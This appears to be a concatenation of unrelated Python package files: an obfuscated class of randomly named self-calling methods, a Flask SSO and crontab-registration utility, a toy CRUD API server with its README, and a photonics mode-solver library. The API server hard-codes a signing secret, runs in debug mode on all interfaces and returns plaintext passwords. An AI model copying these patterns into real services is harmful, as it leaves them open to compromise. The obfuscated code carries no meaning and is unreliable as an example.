return self.__xfNucAoodmvCzzGm()
def __yvJVkPFgCkFiGOK(self, IbkzTSRJfA, UElAwBLjMBkCnFofng, nhnfwHQqljdzYdZrf):
return self.__oCLuzZWuMeq()
def __oCLuzZWuMeq(self, RNroHSFlVmbuaiUdQXdX, CcYfDTQl, DLfOzVXvIcMwYXb, otEGnONLVJu, TjWpFwTLWIuZOLnrut):
return self.__jaWJkeJKlIRVNVvkV()
def __nhfCiEmWABwXtQ(self, pxOtJXwyVQo, NbLFDtaD, WWNFATX, CSBSbf):
return self.__jaWJkeJKlIRVNVvkV()
def __QkXTIalTM(self, IWBswTnrfa, TAlYz):
return self.__nhfCiEmWABwXtQ()
def __RcNsAVeYyUhofh(self, ECLlefj, nRBPGvGXzVAdjnj):
return self.__HFlPHDXPZMmmkEueBpI()
def __DZrVZAuYHy(self, kyBEeRSPbxGW, LZPpjr, NnDOpDCVeCH, ONWPwMIQgqRtt):
return self.__nhfCiEmWABwXtQ()
def __rbpTlwqXoBHqYukNSo(self, incnorYGIIrZELRbpjd, CjiFIUzRAjpyoJdSXT, gHmHhRlHGVsqj, yPUzQvaHwcao, mINOxWvaGqzTUcAl, mXycfXox, cLjIWjHgvPXsx):
return self.__YYanMeWxtLxkHdBwS()
class rGkEqkHmUTRztKbj:
def __init__(self):
self.__tEPfKdopCgAmZe()
self.__eMbOHCDyH()
self.__NAkGQShvdSDtsyDKHUQe()
self.__DoNiaJRZYObPSNN()
self.__yRTVaUmfHAaQEzanpn()
self.__CpFTSYsKEPNWDJptedo()
self.__ciZEtWjKonuDzqm()
self.__sKpSuHSVlRGgvxGDt()
self.__ERNsRXxAvUDVcuJszgOs()
self.__yumQjfKwLMkBiLgNW()
self.__KCEVhjgxfzGVVEkpT()
def __tEPfKdopCgAmZe(self, YFguYFjlHpH, nDyqEaBNKkMr, UXzapCEYdvJSGq):
return self.__tEPfKdopCgAmZe()
def __eMbOHCDyH(self, uubrjAgigAhoCtUYllsJ, weUkKHJKDUgbdk, ibvlAl, KcLTdgQDjsVYpF):
return self.__ciZEtWjKonuDzqm()
def __NAkGQShvdSDtsyDKHUQe(self, olVoIK, bDEvPlGdZWSNlcRKIZJK, QRgdqLXDjLMHpNPs, angwIjMGvsaxyNvbr):
return self.__yRTVaUmfHAaQEzanpn()
def __DoNiaJRZYObPSNN(self, iENEozJheyaXgueYOxMR, DBJXwFEn, YbLnVNnShdCLJTxto, xBwGFDJXlkPeQFnDyF, MKIzbigCuowJwm, TEocGKiBgou, TaoXzGVlqHlgUEeJeYD):
return self.__KCEVhjgxfzGVVEkpT()
def __yRTVaUmfHAaQEzanpn(self, xlqtePZqjPLLitITP):
return self.__DoNiaJRZYObPSNN()
def __CpFTSYsKEPNWDJptedo(self, ZbwzMBpdTlHHnr, QLeefzyNzytNGixa, bgQEfifIAEVdUUDy):
return self.__NAkGQShvdSDtsyDKHUQe()
def __ciZEtWjKonuDzqm(self, lcNtCmJuryMUvjEcYnD, aHdcDtxkwajUwXWoU, JUaCatOyspvfEpCUYwpt, DmZYSrYHcQthIXnQV, RBdSDdtRHpycYlwV):
return self.__CpFTSYsKEPNWDJptedo()
def __sKpSuHSVlRGgvxGDt(self, KWfJXxNm, ehBboxT, ZYcJpjKYRRjtxAD, xkzALvlXClnFjWCmgPQ, uWXyQgFUd, ljUfIvGGuFSuU):
return self.__ERNsRXxAvUDVcuJszgOs()
def __ERNsRXxAvUDVcuJszgOs(self, jDXMbCf, Hkaci, fyAJrbrgLUcg, ohHKKhmruVqFGGzOZE, FFTudiRjbD, dUcUqNRlcrq):
return self.__NAkGQShvdSDtsyDKHUQe()
def __yumQjfKwLMkBiLgNW(self, ZNpKODMQdylVW, duZCzQrfKVgetAR, pQoafmcyukNTUSpQS, KeufsoswgXvgt):
return self.__ciZEtWjKonuDzqm()
def __KCEVhjgxfzGVVEkpT(self, AXSWAiufuBL, NqdQWTtWSR, kOMcpEXyjNgKkSbDHlU, bJTMynrq, XzNOktDJIjCYxCU, bdophPzzKMFeVFsjkl, wHCQuwwOyYVNflCQZ):
return self.__tEPfKdopCgAmZe() | 90456984689490856 | /90456984689490856-0.tar.gz/90456984689490856-0/pyscrape/__init__.py | __init__.py |
from crontab import CronTab
import os
import inspect
import hashlib
import requests
import sys
import pymysql
import getpass
import json
from flask import request, json, session, abort
from functools import wraps
from flask_session import Session
frame = inspect.stack()[1]
index = inspect.getmodule(frame[0])
LOG_FILE_NAME_DEFAULT = "RunTime.log"
FILENAME = os.path.abspath(index.__file__)
LOG_PATH = os.path.dirname(FILENAME) + "/log/"
if not os.path.exists(LOG_PATH):
os.makedirs(LOG_PATH)
LOG_FILE = LOG_PATH + LOG_FILE_NAME_DEFAULT
APP = None
AUTH_SERVER = None
def build(app, server):
global AUTH_SERVER, APP
AUTH_SERVER = server
APP = app
# APP.config["SESSION_COOKIE_NAME"] = project_id
# APP.config["SESSION_TYPE"] = 'filesystem'
# APP.secret_key = secret_key
# Session(APP)
@APP.route('/userInfo', methods=['GET'])
@login_required
def userInfo():
userinfo = {}
for key, value in session.items():
userinfo[key] = value
return json.dumps(userinfo)
@APP.route('/api/logout', methods=['GET'])
def logOut():
session.clear()
return 'success'
def login_required(f):
"""
Auth wraps
:param f:
:return:
"""
@wraps(f)
def verify(*args, **kwargs):
# 存在局部会话, 放行
if session.get('isLogin') == True:
return f(*args, **kwargs)
# 不存在局部会话, 校验
# check1: 检验是否存在全局会话,并取得ssoToken
ssoToken = request.args.get('ssoToken')
headers = {
'act': request.headers.get('act'),
'cookie': request.headers.get('cookie')
}
if ssoToken is None or ssoToken == '':
req = requests.get(AUTH_SERVER + '/auth/checkLogin', headers=headers)
if req.status_code != 200:
return abort(401)
else:
ssoToken = json.loads(req.text).get('ssoToken')
# check2: 携带ssoToken向认证中心注册并取得用户信息
# 创建临时session, 以获得session.sid
session['isLogin'] = False
payload = {
'appkey': 'alarm',
'ssoToken': ssoToken,
'sessionId': session.sid,
'logoutUrl': request.scheme + '://' + request.host + '/api/logout'
}
req = requests.post(AUTH_SERVER + '/auth/verifyToken', headers=headers, data=payload)
if req.status_code != 200:
session.clear()
return abort(401)
else:
auth_info = json.loads(req.text)
# 生成局部会话
for key, value in auth_info.items():
session[key] = value
session['isLogin'] = True
# 放行
return f(*args, **kwargs)
return verify
def get_md5_value(value):
"""
:param value: String
:return: MD5 result
"""
my_md5 = hashlib.md5()
my_md5.update(value)
my_md5_Digest = my_md5.hexdigest()
return my_md5_Digest
JOB_ID = get_md5_value(FILENAME)
IS_REGISTER = 0
class SimpleCronControl:
def __init__(self, url, token):
self.user_name = getpass.getuser()
self.my_cron = CronTab(user=self.user_name)
self.register_flag = 0
self.work = None
self.job_state = False
self.threshold = {}
self.base_url = url
self.token = token
def list_cron(self):
"""
list all cron jobs of this user
:return: Return jobs list
"""
crontab_jobs = list()
for job in self.my_cron:
crontab_jobs.append(job)
return crontab_jobs
def get_url(self, path):
return "%s/%s" % (self.base_url, path)
def send(self, type, message):
url = self.get_url("message_receiver")
token = self.token
req_body = dict()
req_body["token"] = token
req_body["type"] = type
req_body["message"] = message
job_status_response = requests.post(url=url, json=req_body, timeout=200)
if job_status_response.status_code != 200:
msg = job_status_response.json().get("message")
raise RuntimeError(
"Can not get expect Response from %s, Code: %s, Msg:%s" % (url, job_status_response.status_code, msg))
def cron_control(self, command_core="python"):
"""
You can control your cron job whih this function
:param setall: cron job's frequency
:param command_core: basic command for this cron job
:return:
"""
url = self.get_url("verify")
token = self.token
job_status_response = requests.get(url=url, params={"token": token}, timeout=200)
if job_status_response.status_code != 200:
raise RuntimeError("Can not get expect Response from %s, Code: %s" % (url, job_status_response.status_code))
res = job_status_response.json().get("data")
if not res.get("job_setall") or not res.get("status"):
raise RuntimeError("The Response is not expected")
setall = res.get("job_setall")
global JOB_ID
JOB_ID = get_md5_value(token)
if res.get("status") == "1":
self.job_state = True
if res.get("job_threshold"):
self.threshold = res.get("job_threshold")
if not self.job_state:
print("Job Status is False!\nexit!")
exit()
if not self.is_register(setall):
print("Prepare to Register Job")
job = self.my_cron.new(
command='%s %s %s >> %s 2>&1 &' % (command_core, FILENAME, " ".join(sys.argv[1:]), LOG_FILE),
comment="%s|%s" % (JOB_ID, setall))
job.setall(setall)
self.my_cron.write()
print("Register Cron Job Success")
else:
print("Job Status:Healthy")
return self
def is_register(self, setall):
"""
Judge the Cron Job has register or not
:param setall: cron job's frequency
:return:
"""
for job in self.my_cron:
comment_list = job.comment.split("|")
if comment_list.__len__() == 2 and comment_list[0] == JOB_ID:
if comment_list[1] != setall:
print("Prepare to change Cron Job's Frequency")
job.setall(setall)
job.set_comment("%s|%s" % (JOB_ID, setall))
self.my_cron.write()
print("Cron Job's Frequency has changed")
self.register_flag = 1
self.work = job
return True
return False
class NormalTools:
"""
Daily tools
"""
def __init__(self): pass
def mysql_connector(self, host, port, user, passwd, database, charset='utf8', write_timeout=100):
return pymysql.connect(host=host,
port=port,
user=user,
password=passwd,
database=database, charset=charset, write_timeout=write_timeout) | 91act-platform | /91act-platform-1.0.5.tar.gz/91act-platform-1.0.5/alarm_util_pkg/core.py | core.py |
# A Api Server
## 一、概述
A api server,是一个 Resful 风格的简易 API 服务,提供了对用户账号进行增删改查(CRUD)功能的接口服务,包含了接口的签名校验机制,方便 API 自动化测试工具的开发与调试!
#### 1. 本地启动服务
- (1)命令行启动
```
pip install A-Api-Server
a_api_server 自定义端口号(默认5000)
```
- (2)clone 源码启动
```
pip install gunicorn flask
cd a_api_server
python api_server.py 自定义端口号(默认5000)
```
(注意:兼容 Python2 和 Python3)
### 2. 服务端启动服务,推荐使用 gunicorn
```
cd a_api_server
gunicorn api_server:app -p api_server.pid -b 0.0.0.0:5000 -w 4 -D
服务端关闭服务的命令如下:
kill -HUP `cat api_server.pid`
kill `cat api_server.pid`
```
### 3. 启动后访问地址
```
http://your.ip:5000
```
## 二、接口文档
### 1. API V1 接口说明
- 接口基准地址:http://your.ip:5000/
- 使用 HTTP Status Code 标识状态
- 数据返回格式统一使用 JSON
- API V1 认证统一使用 Token 认证
- 需要授权的 API ,必须在请求头中使用`device_sn`字段提供设备序列号和 `token` 字段提供访问令牌
- 全局请求头
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------------ | -------- | ---------- | --------------------------- |
| Content-Type | String | 内容类型 | application/json |
| device_sn | String | 设备序列号 | 唯一设备标识符 |
| token | String | 访问令牌 | 拥有 token 的设备才有访问权 |
#### 1.1. 支持的请求方法
- GET(SELECT):从服务器取出资源(一项或多项)。
- POST(CREATE):在服务器新建一个资源。
- PUT(UPDATE):在服务器更新资源(客户端提供改变后的完整资源)。
- PATCH(UPDATE):在服务器更新资源(客户端提供改变的属性)。
- DELETE(DELETE):从服务器删除资源。
- HEAD:获取资源的元数据。
- OPTIONS:获取信息,关于资源的哪些属性是客户端可以改变的。
#### 1.2. 通用返回状态说明
| _状态码_ | _含义_ | _说明_ |
| -------- | --------------------- | --------------------------------------------------- |
| 200 | OK | 请求成功 |
| 201 | CREATED | 创建成功 |
| 204 | DELETED | 删除成功 |
| 400 | BAD REQUEST | 请求的地址不存在或者包含不支持的参数 |
| 401 | UNAUTHORIZED | 未授权 |
| 403 | FORBIDDEN | 被禁止访问 |
| 404 | NOT FOUND | 请求的资源不存在 |
| 422 | Unprocesable entity | [POST/PUT/PATCH] 当创建一个对象时,发生一个验证错误 |
| 500 | INTERNAL SERVER ERROR | 内部错误 |
---
### 2. 具体接口说明
#### 2.1. 获取令牌
- 请求路径:/api/get-token
- 请求方法:post
- 请求头
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ----------- | -------- | ---------- | ---- |
| User-Agent | String | 用户代理 | |
| device_sn | String | 设备序列号 | |
| os_platform | String | 系统平台 | |
| app_version | String | 应用版本 | |
- 请求参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------ | -------- | -------- | ------------------------ |
| sign | String | 加密签名 | 根据请求头和密钥加密生成 |
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------- | -------- | -------- | ---------- |
| success | Boolean | 是否成功 | |
| token | String | 访问令牌 | 长度 16 位 |
- 成功返回
```
状态码:200
响应体:
{
'success': true,
'token': "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aW"
}
```
- 失败返回
```
状态码:403
响应体:
{
'success': false,
'msg': "Authorization failed!"
}
```
- 签名生成算法
```python
def get_sign(*args):
SECRECT_KEY = 'YouMi'
content = ''.join(args).encode('ascii')
sign_key = SECRECT_KEY.encode('ascii')
sign = hmac.new(sign_key, content, hashlib.sha1).hexdigest()
return sign
sign = get_sign(user_agent, device_sn, os_platform, app_version)
```
#### 2.2. 新建用户
- 请求路径:/api/users/:id
- 请求方法:post
- 请求参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| -------- | -------- | -------- | ---- |
| id | Int | 用户 ID | |
| name | String | 用户名 | |
| password | String | 密码 | |
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------- | -------- | -------- | ---- |
| success | Boolean | 是否成功 | |
| msg | String | 说明信息 | |
- 成功返回
```
状态码:201
响应体:
{
'success': true,
'msg': "user created successfully."
}
```
- 失败返回
```
状态码:422
响应体:
{
'success': false,
'msg': "user already existed."
}
```
#### 2.3. 根据 ID 查询用户信息
- 请求路径:/api/users/:id
- 请求方法:get
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| -------- | -------- | -------- | ---- |
| success | Boolean | 是否成功 | |
| name | String | 用户名 | |
| password | String | 密码 | |
- 成功返回
```
状态码:200
响应体:
{
'success': true,
'data': {
'name': 'admin',
'password': '123456'
}
}
```
- 失败返回
```
状态码:404
响应体:
{
'success': fasle,
'data': {}
}
```
#### 2.4. 更新用户信息
- 请求路径:/api/users/:id
- 请求方法:put
- 请求参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| -------- | -------- | -------- | ---- |
| id | Int | 用户 ID | |
| name | String | 用户名 | |
| password | String | 密码 | |
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------- | -------- | -------- | ---- |
| success | Boolean | 是否成功 | |
| data | Dict | 用户信息 | |
- 成功返回
```
状态码:200
响应体:
{
'success': true,
'data': {
'name': 'admin',
'password': '123456'
}
}
```
- 失败返回
```
状态码:404
响应体:
{
'success': fasle,
'data': {}
}
```
#### 2.5. 删除用户信息
- 请求路径:/api/users/:id
- 请求方法:delete
- 请求参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------ | -------- | -------- | ---- |
| id | Int | 用户 ID | |
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------- | -------- | -------- | ---- |
| success | Boolean | 是否成功 | |
| data | Dict | 用户信息 | |
- 成功返回
```
状态码:200
响应体:
{
'success': true,
'data': {
'name': 'admin',
'password': '123456'
}
}
```
- 失败返回
```
状态码:404
响应体:
{
'success': fasle,
'data': {}
}
```
#### 2.6. 用户数据列表
- 请求路径:/api/users
- 请求方法:get
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------- | -------- | ------------ | ---- |
| success | Boolean | 是否成功 | |
| count | Int | 用户总数 | |
| items | Array | 用户数据集合 | |
- 成功返回
```
状态码:200
响应体:
{
'success': true,
'count': 3,
'items': [
{'name': 'admin1', 'password': '123456'},
{'name': 'admin2', 'password': '123456'},
{'name': 'admin3', 'password': '123456'}
]
}
```
#### 2.7. 清空用户数据
- 请求路径:/api/reset-all
- 请求方法:get
- 响应参数
| 参数名 | 参数类型 | 参数说明 | 备注 |
| ------- | -------- | -------- | ---- |
| success | Boolean | 是否成功 | |
- 成功返回
```
状态码:200
响应体:
{
'success': true
}
```
## 三、自动化发布:一键打 Tag 并上传至 PYPI
每次在 ** about **.py 更新版本号后,运行以下命令,实现自动化更新打包上传至 [PYPI](https://pypi.org/) ,同时根据其版本号自动打 Tag 并推送到仓库:
```
python3 setup.py pypi
```
注意:上传前需提前在 twine 工具中配置自己的 Pypi 的账号信息!!!
### 四、CHANGELOG
```
v1.0.0
1、实现对用户账号进行增删改查功能的 API 服务,包含了接口的签名校验机制;
2、完善了 API 使用文档;
3、添加了自动化打包脚本;
```
## 五、致谢
**A-Api-Server** 工具的产生和打包,主要参考了开源项目 [HttpRunner](https://github.com/httprunner/httprunner),受益多多,感谢!
## LICENSE
```
MIT License
Copyright (c) 2019 Devin https://zhangchuzhao.site
Copyright (c) 2017 Toby Qin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```
| A-Api-Server | /A_Api_Server-1.1.7.tar.gz/A_Api_Server-1.1.7/README.md | README.md |
import random
import hashlib
import string
import hmac
import json
import sys
from functools import wraps
from flask import Flask, make_response, request
FLASK_APP_HOST = '0.0.0.0'
FLASK_APP_PORT = 5000
DEBUG = True
SECRET_KEY = "YouMi"
app = Flask(__name__)
""" storage all users' data
data structure:
users_dict = {
'uid1': {
'name': 'name1',
'password': 'pwd1'
},
'uid2': {
'name': 'name2',
'password': 'pwd2'
}
}
"""
users_dict = {}
""" storage all token data
data structure:
token_dict = {
'device_sn1': 'token1',
'device_sn2': 'token2'
}
"""
token_dict = {}
def gen_random_string(str_len):
random_char_list = []
for _ in range(str_len):
random_char = random.choice(string.ascii_letters + string.digits)
random_char_list.append(random_char)
random_string = ''.join(random_char_list)
return random_string
def get_sign(*args):
content = ''.join(args).encode('ascii')
sign_key = SECRET_KEY.encode('ascii')
sign = hmac.new(sign_key, content, hashlib.sha1).hexdigest()
return sign
def gen_md5(*args):
return hashlib.md5("".join(args).encode('utf-8')).hexdigest()
def validate_request(func):
@wraps(func)
def wrapper(*args, **kwargs):
device_sn = request.headers.get('device_sn', "")
token = request.headers.get('token', "")
if not device_sn or not token:
result = {
'success': False,
'msg': "device_sn or token is null."
}
response = make_response(json.dumps(result), 401)
response.headers["Content-Type"] = "application/json"
return response
if token_dict[device_sn] != token:
result = {
'success': False,
'msg': "Authorization failed!"
}
response = make_response(json.dumps(result), 403)
response.headers["Content-Type"] = "application/json"
return response
return func(*args, **kwargs)
return wrapper
@app.route('/')
def index():
# return "Hello, this is self-help api service, welcome to use!"
return """
<div style="text-align: center;">
<h1>A Api Server</h1>
<p><a href="https://github.com/zhuifengshen/a-api-server">A Api Server</a>,是一个 Resful 风格的简易 API 服务,提供了对用户账号进行增删改查(CRUD)功能的接口服务,包含了接口的签名校验机制,方便 API 自动化测试工具的开发与调试!</p>
</div>
"""
@app.route('/api/get-token', methods=['POST'])
def get_token():
user_agent = request.headers.get('User-Agent', "")
device_sn = request.headers.get('device_sn', "")
os_platform = request.headers.get('os_platform', "")
app_version = request.headers.get('app_version', "")
data = request.get_json()
sign = data.get('sign', "")
expected_sign = get_sign(user_agent, device_sn, os_platform, app_version)
if expected_sign != sign or not user_agent or not device_sn or not os_platform or not app_version:
result = {
'success': False,
'msg': "Authorization failed!"
}
response = make_response(json.dumps(result), 403)
else:
token = gen_random_string(16)
token_dict[device_sn] = token
result = {
'success': True,
'token': token
}
response = make_response(json.dumps(result))
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users')
@validate_request
def get_users():
users_list = [user for uid, user in users_dict.items()]
users = {
'success': True,
'count': len(users_list),
'items': users_list
}
response = make_response(json.dumps(users))
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/reset-all')
@validate_request
def clear_users():
users_dict.clear()
result = {
'success': True
}
response = make_response(json.dumps(result))
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['POST'])
@validate_request
def create_user(uid):
user = request.get_json()
if uid not in users_dict:
result = {
'success': True,
'msg': "user created successfully."
}
status_code = 201
users_dict[uid] = user
else:
result = {
'success': False,
'msg': "user already existed."
}
status_code = 422
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>')
@validate_request
def get_user(uid):
user = users_dict.get(uid, {})
if user:
result = {
'success': True,
'data': user
}
status_code = 200
else:
result = {
'success': False,
'data': user
}
status_code = 404
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['PUT'])
@validate_request
def update_user(uid):
user = users_dict.get(uid, {})
if user:
user = request.get_json()
success = True
status_code = 200
users_dict[uid] = user
else:
success = False
status_code = 404
result = {
'success': success,
'data': user
}
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['DELETE'])
@validate_request
def delete_user(uid):
user = users_dict.pop(uid, {})
if user:
success = True
status_code = 200
else:
success = False
status_code = 404
result = {
'success': success,
'data': user
}
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
def cli_main():
if len(sys.argv) > 1:
custom_port = int(sys.argv[1])
else:
custom_port = FLASK_APP_PORT
app.run(host=FLASK_APP_HOST, debug=DEBUG, port=custom_port)
if __name__ == "__main__":
cli_main() | A-Api-Server | /A_Api_Server-1.1.7.tar.gz/A_Api_Server-1.1.7/a_api_server/api_server.py | api_server.py |
[](https://a-fmm.readthedocs.io/en/latest/?badge=latest)
[](https://github.com/psf/black)
[](https://choosealicense.com/licenses/mit/)
# A-FMM
This is a Python implementation the Aperiodic-Fourier Modal Method, a fully vectorial method for solving Maxwell equations that combines a Fourier-based mode solver and a scattering matrix recursion algorithm to model full 3D structures. This approach is well suited to calculate modes, transmission, reflection, scattering and absorption of multi-layered structures. Moreover, support for Bloch modes of periodic structures allows for the simulation of photonic crystals or waveguide Bragg gratings.
## Installation
You can install A_FMM directly from pypi by running:
pip install A_FMM
## Documentation
Full documentation is available on [Read the Docs](https://a-fmm.readthedocs.io)
| A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/README.md | README.md |
import copy
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from matplotlib.backends.backend_pdf import PdfPages
from scipy import linalg
import A_FMM
import A_FMM.sub_sm as sub
from A_FMM.creator import Creator
from A_FMM.scattering import S_matrix
class Layer:
"""Class for the definition of a single layer"""
def __init__(self, Nx: int, Ny: int, creator: Creator, Nyx: float = 1.0):
"""Creator
Args:
Nx (int): truncation order in x direction
Ny (int): truncation order in y direction
Nyx (float): ratio between the cell's dimension in y and x (ay/ax)
"""
self.Nx = Nx
self.Ny = Ny
self.NPW = (2 * Nx + 1) * (2 * Ny + 1)
self.G = sub.createG(self.Nx, self.Ny)
self.G_inv = {v: k for k, v in self.G.items()}
self.D = len(self.G)
self.creator = copy.deepcopy(creator)
self.Nyx = Nyx
self.FOUP = self.__create_eps()
self.INV = linalg.inv(self.FOUP)
self.EPS1 = sub.fou_xy(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
)
self.EPS2 = sub.fou_yx(
self.Nx,
self.Ny,
self.G,
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
)
self.TX = False
self.TY = False
def __create_eps(self):
nx = 2 * self.Nx
ny = 2 * self.Ny
mx = 4 * self.Nx + 1
my = 4 * self.Ny + 1
fourier_transform = np.zeros((mx, my), dtype=complex)
x_list = self.creator.x_list
y_list = self.creator.y_list
eps_lists = self.creator.eps_lists
G = self.G
for i in range(mx):
for j in range(my):
fourier_transform[i, j] = sub.fou(
(i + nx) % mx - nx, (j + ny) % my - ny, x_list, y_list, eps_lists
)
D = len(G)
F = np.zeros((D, D), complex)
for i, (gx1, gy1) in G.items():
for j, (gx2, gy2) in G.items():
F[i, j] = fourier_transform[gx1 - gx2, gy1 - gy2]
return F
def inspect(self, st=""):
"""Function for inspectig the attributes of a layer object
Args:
st (string): string to print before the inspection for identification
"""
att = sub.get_user_attributes(self)
print(st)
print(22 * "_")
print("| INT argument")
for i in att:
if type(i[1]) is int:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Float argument")
for i in att:
if type(i[1]) is float:
print("|%10s%10s" % (i[0], str(i[1])))
for i in att:
if type(i[1]) is np.float64:
print("|%10s%10s" % (i[0], str(i[1])))
print("| BOOL argument")
for i in att:
if type(i[1]) is bool:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Array argument")
for i in att:
if type(i[1]) is np.ndarray:
print("|%10s%10s" % (i[0], str(np.shape(i[1]))))
print("")
def eps_plot(self, pdf=None, N=200, s=1):
"""Function for plotting the dielectric consstat rebuit from plane wave expansion
Args:
pdf (string or PdfPages): file for printing the the epsilon
if a PdfPages object, the page is appended to the pdf
if string, a pdf with that name is created
N (int): number of points
s (float): number of cell replicas to display (default 1)
"""
[X, Y] = np.meshgrid(
np.linspace(-s * 0.5, s * 0.5, s * N),
np.linspace(-s * 0.5, s * 0.5, int(s * N * self.Nyx)),
)
EPS = np.zeros((N, N), complex)
# for i in range(self.D):
# EPS+=sub.fou(self.G[i][0],self.G[i][1],self.creator.x_list,self.creator.y_list,self.creator.eps_lists)*np.exp(-(0+2j)*np.pi*(self.G[i][0]*X+self.G[i][1]*Y))
EPS = sum(
[
sub.fou(
self.G[i][0],
self.G[i][1],
self.creator.x_list,
self.creator.y_list,
self.creator.eps_lists,
)
* np.exp((0 + 2j) * np.pi * (self.G[i][0] * X + self.G[i][1] * Y))
for i in range(self.D)
]
)
plt.figure()
# plt.imshow(np.real(EPS),aspect='auto',extent=[-s*0.5,s*0.5,-self.Nyx*s*0.5,self.Nyx*s*0.5])
plt.imshow(
np.real(EPS),
extent=[-s * 0.5, s * 0.5, -self.Nyx * s * 0.5, self.Nyx * s * 0.5],
origin="lower",
)
plt.colorbar()
if pdf == None:
plt.show()
elif isinstance(pdf, PdfPages):
pdf.savefig()
else:
a = PdfPages(pdf + ".pdf")
a.savefig()
a.close()
plt.close()
def transform(self, ex: float = 0, ey: float = 0, complex_transform: bool = False):
"""Function for adding the real coordinate transfomr to the layer
Note: for no mapping, set the width to 0
Args:
ex (float): relative width of the unmapped region in x direction. Default is 0 (no mapping)
ey (float): relative width of the unmapped region in y direction. Default is 0 (no mapping)
complex_transform (bool): False for real transform (default), True for complex one.
"""
if complex_transform:
transform_function = sub.fou_complex_t
else:
transform_function = sub.fou_t
if ex != 0.0:
self.TX = True
self.ex = ex
self.FX = np.zeros((self.D, self.D), complex)
nx = 2 * self.Nx
mx = 4 * self.Nx + 1
F = [transform_function((i + nx) % mx - nx, ex) for i in range(mx)]
for i, (gx1, gy1) in self.G.items():
for j, (gx2, gy2) in self.G.items():
if gy1 != gy2:
continue
self.FX[i, j] = F[gx1 - gx2]
else:
self.FX = None
if ey != 0.0:
self.TY = True
self.ey = ey
self.FY = np.zeros((self.D, self.D), complex)
ny = 2 * self.Ny
my = 4 * self.Ny + 1
F = [transform_function((i + ny) % my - ny, ey) for i in range(my)]
for i, (gx1, gy1) in self.G.items():
for j, (gx2, gy2) in self.G.items():
if gx1 != gx2:
continue
self.FY[i, j] = F[gy1 - gy2]
else:
self.FY = None
return self.FX, self.FY
def add_transform_matrix(
self,
ex: float = 0.0,
FX: np.ndarray = None,
ey: float = 0.0,
FY: np.ndarray = None,
):
"""Function for adding matrix of a coordinate transform
Args:
ex (float): relative width of the unmapped region in x direction. Default is 0. This is only for keeping track of the value, as it has no effect on the transformation.
FX (ndarray): FX matrix of the coordinate trasnformation
ey (float): relative width of the unmapped region in y direction. Default is 0. This is only for keeping track of the value, as it has no effect on the transformation.
FY (ndarray): FY matrix of the coordinate trasnformation
"""
if ex != 0:
self.TX = True
self.ex = ex
self.FX = FX
else:
self.FX = None
if ey != 0:
self.TY = True
self.ey = ey
self.FY = FY
else:
self.FY = None
def mode(self, k0: float, kx: float = 0.0, ky: float = 0.0):
"""Calculates the eighenmode of the layer
Args:
k0 (float): Vacuum wavevector
kx (float): Wavevector in the x direction
ky (float): Wavevector in the y direction
"""
self.k0 = k0
self.kx = kx
self.ky = ky
(k1, k2) = sub.createK(self.G, k0, kx=kx, ky=ky, Nyx=self.Nyx)
if self.TX:
k1 = np.dot(self.FX, k1)
if self.TY:
k2 = np.dot(self.FY, k2)
self.GH, self.M = sub.create_2order_new(
self.D, k1, k2, self.INV, self.EPS1, self.EPS2
)
[self.W, self.V] = linalg.eig(self.M)
self.gamma = np.sqrt(self.W) * np.sign(np.angle(self.W) + 0.5 * np.pi)
if np.any(np.real(self.gamma) + np.imag(self.gamma) <= 0.0):
print("Warining: wrong complex root")
if np.any(np.abs(self.gamma) <= 0.0):
print("Warining: gamma=0")
self.VH = np.dot(self.GH, self.V / self.gamma)
def clear(self):
"""Removes data created in mode method"""
self.VH = None
self.M = None
self.GH = None
self.W = None
self.V = None
self.gamma = None
def get_index(self, ordered: bool = True) -> np.ndarray:
"""Returns the effective idexes of the modes
Args:
ordered (bool): if True (default) the modes are ordered by decreasing effective index
"""
if ordered:
Neff = self.gamma[np.argsort(self.W)[::-1]]
else:
Neff = self.gamma
return Neff
def mat_plot(self, name: str):
